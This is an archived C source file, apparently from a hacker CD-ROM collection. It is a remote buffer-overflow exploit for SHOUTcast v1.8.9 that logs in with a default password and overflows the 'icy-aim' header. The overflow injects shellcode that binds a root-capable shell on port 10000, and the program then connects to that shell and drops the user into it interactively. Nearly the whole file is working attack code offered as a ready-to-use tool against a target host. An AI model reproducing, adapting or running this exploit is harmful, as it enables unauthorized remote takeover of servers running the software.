home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 5 / hacker05 / 05_HACK_05.ISO / exploits / mayday / mayday-linux.c
Encoding:
C/C++ Source or Header  |  2002-06-26  |  6.2 KB  |  200 lines
  1. /*           _ ________            _____                        ______
  2.  *  __ ___ ____       /____.------`    /_______.------.___.----`  ___/____ _______
  3.  *       _/    \ _   /\   __.  __//   ___/_    ___.  /_\    /_    |     _/
  4.  * ___ ._\    . \\  /__  _____/ _    /     \_  |    /__      |   _| slc | _____ _
  5.  *    - -------\______||--._____\---._______//-|__    //-.___|----._____||
  6.  * mayday.c - SHOUTcast v1.8.9 remote exploit   / \  / "Never trust a DJ"
  7.  * by eSDee of Netric (www.netric.org)             \/
  8.  *
  9.  * Tested on:
  10.  * - Redhat 7.x
  11.  * - Redhat 6.x
  12.  * - Suse 6.x
  13.  * - Suse 7.x
  14.  *
  15.  * More information about this bug can be found at:
  16.  * http://www.netric.org/advisories/netric-adv006.txt
  17.  *
  18.  */
  19.  
  20. #include <stdio.h>
  21. #include <netdb.h>
  22. #include <sys/types.h>
  23. #include <sys/socket.h>
  24. #include <netinet/in.h>
  25. #include <getopt.h>
  26.  
  27. char shellcode[] =  /* binds to port 10000 by Bighawk */
  28.         "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd"
  29.         "\x80\x89\xc7\x52\x66\x68\x27\x10\x43\x66\x53\x89\xe1\x6a\x10"
  30.         "\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50"
  31.         "\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f"
  32.         "\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
  33.         "\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";
  34.  
  35. int sock;
  36. void usage();
  37. void shell();
  38.  
  39. int
  40. main (int argc,char *argv[])
  41. {
  42.         char buf1[1130];
  43.         char buf2[1800];
  44.         char host[256];
  45.         char pass[256]="changeme";
  46.  
  47.         int i=0;
  48.         int c=0;
  49.         int port=8001;
  50.         unsigned int ret = 0x08069687;
  51.  
  52.         fprintf(stdout,"SHOUTcast v1.8.9 remote exploit by eSDee of Netric\n");
  53.         fprintf(stdout,"-----------------------------------(www.netric.org)\n");
  54.  
  55.         while((c=getopt(argc,argv,"t:p:a:")) !=EOF)
  56.         {
  57.                 switch(c)
  58.                 {
  59.                         case 'p':
  60.                                 port=atoi(optarg);
  61.                                 if ((port <= 0) || (port > 65535)) {
  62.                                         fprintf(stderr,"Invalid port.\n\n");
  63.                                         exit(1);
  64.                                 }
  65.                                 break;
  66.                         case 'a':
  67.                                 memset(pass,0x0,sizeof(pass));
  68.                                 strncpy(pass,optarg,sizeof(pass) - 1);
  69.                                 break;
  70.                         case 't':
  71.                                 memset(host,0x0,sizeof(host));
  72.                                 strncpy(host,optarg,sizeof(host) - 1);
  73.                                 break;
  74.                         default:
  75.                                 usage(argv[0]);
  76.                                 exit(1);
  77.                                 break;
  78.                 }
  79.         }
  80.  
  81.  
  82.         if (strlen(host) == 0) {
  83.                 usage(argv[0]);
  84.                 exit(1);
  85.         }
  86.         sock=openhost(host, port);
  87.  
  88.         if (sock==-1) {
  89.                 fprintf(stderr,"- Unable to connect.\n\n");
  90.                 exit(1);
  91.         }
  92.  
  93.         write(sock, pass, strlen(pass));
  94.         write(sock, "\n", 1);
  95.  
  96.         memset(buf2,  0x0, sizeof(buf2));
  97.         memset(buf1, 0x90, sizeof(buf1));
  98.  
  99.         for(i=0;i < strlen(shellcode); i++) buf1[i+600] = shellcode[i];
  100.  
  101.         buf1[759] = (ret & 0x000000ff);
  102.         buf1[760] = (ret & 0x0000ff00) >> 8;
  103.         buf1[761] = (ret & 0x00ff0000) >> 16;
  104.         buf1[762] = (ret & 0xff000000) >> 24;
  105.  
  106.         buf1[1120] = 0x0;
  107.  
  108.         sprintf(buf2,   "icy-name: netric\r\n"
  109.                         "icy-aim: %s\r\n"
  110.                         "\r\n", buf1);
  111.  
  112.         fprintf(stdout, "Connected, sending code...\n");
  113.         fprintf(stdout, "Ret: 0x%08x\n", ret);
  114.  
  115.         write(sock, buf2, strlen(buf2));
  116.         sleep(2);
  117.         close(sock);
  118.  
  119.         sock=openhost(host, 10000);
  120.  
  121.         if (sock==-1) {
  122.                 fprintf(stderr, "Exploit failed!\n\n");
  123.                 exit(1);
  124.         }
  125.  
  126.         fprintf(stdout, "Exploiting succesful.\n");
  127.         fprintf(stdout, "---------------------------------------------------\n");
  128.         shell();
  129.         return 0;
  130. }
  131.  
  132. void
  133. usage(char *prog)
  134. {
  135.         fprintf(stderr,"Usage: %s -t [-pa]\n",prog);
  136.         fprintf(stderr,"-t target       The host to attack.\n");
  137.         fprintf(stderr,"-a password     Default password is \"changeme\".\n");
  138.         fprintf(stderr,"-p port         Default port is 8001.\n\n");
  139. }
  140.  
  141. int
  142. openhost(char *host,int port)
  143. {
  144.         struct sockaddr_in addr;
  145.         struct hostent *he;
  146.  
  147.         he=gethostbyname(host);
  148.  
  149.         if (he==NULL) return -1;
  150.         sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
  151.         if (sock==-1) return -1;
  152.  
  153.         memcpy(&addr.sin_addr, he->h_addr, he->h_length);
  154.  
  155.         addr.sin_family=AF_INET;
  156.         addr.sin_port=htons(port);
  157.  
  158.         if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
  159.         sock=-1;
  160.         return sock;
  161. }
  162.  
  163. void shell() /* taken from an old wuftp exploit */
  164. {
  165.         fd_set  fd_read;
  166.         char buff[1024], *cmd="/bin/uname -a;/usr/bin/id;\n";
  167.         int n;
  168.  
  169.         FD_ZERO(&fd_read);
  170.         FD_SET(sock, &fd_read);
  171.         FD_SET(0, &fd_read);
  172.  
  173.         send(sock, cmd, strlen(cmd), 0);
  174.         while(1) {
  175.                 FD_SET(sock,&fd_read);
  176.                 FD_SET(0,&fd_read);
  177.                 if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
  178.                 if( FD_ISSET(sock, &fd_read) ) {
  179.                         if((n=recv(sock,buff,sizeof(buff),0))<0){
  180.                                 fprintf(stderr, "EOF\n");
  181.                                 exit(2);
  182.                         }
  183.                         if(write(1,buff,n)<0)break;
  184.                 }
  185.  
  186.                 if ( FD_ISSET(0, &fd_read) ) {
  187.                         if((n=read(0,buff,sizeof(buff)))<0){
  188.                                 fprintf(stderr,"EOF\n");
  189.                                 exit(2);
  190.                         }
  191.                         if(send(sock,buff,n,0)<0) break;
  192.                 }
  193.                 usleep(10);
  194.                 }
  195.                 fprintf(stderr,"Connection lost.\n");
  196.                 exit(0);
  197. }
  198.  
  199.  
  200.